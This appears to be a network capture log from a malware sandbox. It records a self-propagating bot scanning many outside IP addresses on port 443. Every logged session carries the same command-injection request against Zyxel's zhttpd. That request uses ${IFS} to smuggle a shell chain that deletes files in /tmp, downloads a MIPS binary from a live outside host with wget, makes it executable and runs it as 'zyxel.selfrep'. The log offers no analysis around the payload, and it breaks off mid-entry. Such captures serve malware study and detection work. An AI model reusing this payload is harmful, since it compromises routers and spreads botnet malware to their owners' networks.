                                                  Jan 19, 2024 18:24:13.404100895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8783192.168.2.1351434140.73.222.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.404146910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8784192.168.2.1344770175.129.37.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.404191017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8785192.168.2.1334890221.241.195.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.404220104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8786192.168.2.1334718219.233.177.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.404259920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8787192.168.2.136097439.89.69.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.404328108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8788192.168.2.1345000135.146.250.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.404359102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8789192.168.2.1355322122.154.154.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.404411077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8790192.168.2.1349082122.3.141.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.404434919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8791192.168.2.133687252.122.236.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.404475927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8792192.168.2.1334582156.114.199.87443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.404515028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8793192.168.2.1353096170.217.85.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.404560089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8794192.168.2.1355934131.87.184.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.404582977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8795192.168.2.1336252211.137.169.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.404613018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8796192.168.2.134167025.172.167.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.404676914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8797192.168.2.134276250.220.220.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.404726982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8798192.168.2.135995643.168.100.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.404742002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8799192.168.2.1348422188.76.200.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.404809952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8800192.168.2.133633241.249.180.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.404836893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8801192.168.2.1345378101.166.246.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.404869080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8802192.168.2.1346950188.231.134.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.404890060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8803192.168.2.1354274124.178.48.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.404948950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8804192.168.2.1335360144.175.53.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.405000925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8805192.168.2.1335640152.187.155.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.405044079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8806192.168.2.1359400144.221.25.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.405091047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8807192.168.2.1359522189.17.144.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.405118942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8808192.168.2.134831018.34.194.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.405153990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8809192.168.2.1356906136.209.122.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.405222893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8810192.168.2.134974423.111.144.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.405258894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8811192.168.2.1343170147.216.234.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.405302048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8812192.168.2.133817677.4.97.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.405354977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8813192.168.2.1333998130.196.20.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.405394077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8814192.168.2.1335648208.28.84.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.405442953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8815192.168.2.1358478177.35.216.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.405488014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8816192.168.2.134013223.117.56.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.405527115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8817192.168.2.1356110107.25.227.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.405565023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8818192.168.2.1334764223.162.23.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.409699917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8819192.168.2.1348882196.32.4.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.409758091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8820192.168.2.1355894220.154.212.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.409786940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8821192.168.2.1353702144.198.54.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.409876108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8822192.168.2.1338538166.192.70.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.409913063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8823192.168.2.133714450.103.95.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.409949064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8824192.168.2.133492466.225.221.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.409982920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8825192.168.2.134445250.171.120.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.410036087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8826192.168.2.13551065.216.108.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.410070896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8827192.168.2.13600569.246.180.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.410116911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8828192.168.2.1358856157.11.206.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.410172939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8829192.168.2.1346476151.249.25.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.410204887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8830192.168.2.1352126148.221.40.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.410248041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8831192.168.2.133979636.173.126.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.410301924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8832192.168.2.1337160141.213.85.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.410340071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8833192.168.2.1338230201.138.13.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.410368919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8834192.168.2.135807654.15.146.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.410402060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8835192.168.2.1336856199.252.216.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.410465956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8836192.168.2.1343154111.140.151.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.410504103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8837192.168.2.1352860216.194.88.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.410526991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8838192.168.2.1353470106.89.182.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.410573959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8839192.168.2.1335118116.237.129.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.410604000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8840192.168.2.1355332144.78.147.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.420298100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8841192.168.2.1347668129.35.212.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.420347929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8842192.168.2.1341826177.224.8.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.420392036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8843192.168.2.1351244161.245.84.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.420445919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8844192.168.2.135920858.177.127.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.420497894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8845192.168.2.1343298138.6.80.107443
                                                  TimestampBytes transferredDirectionData
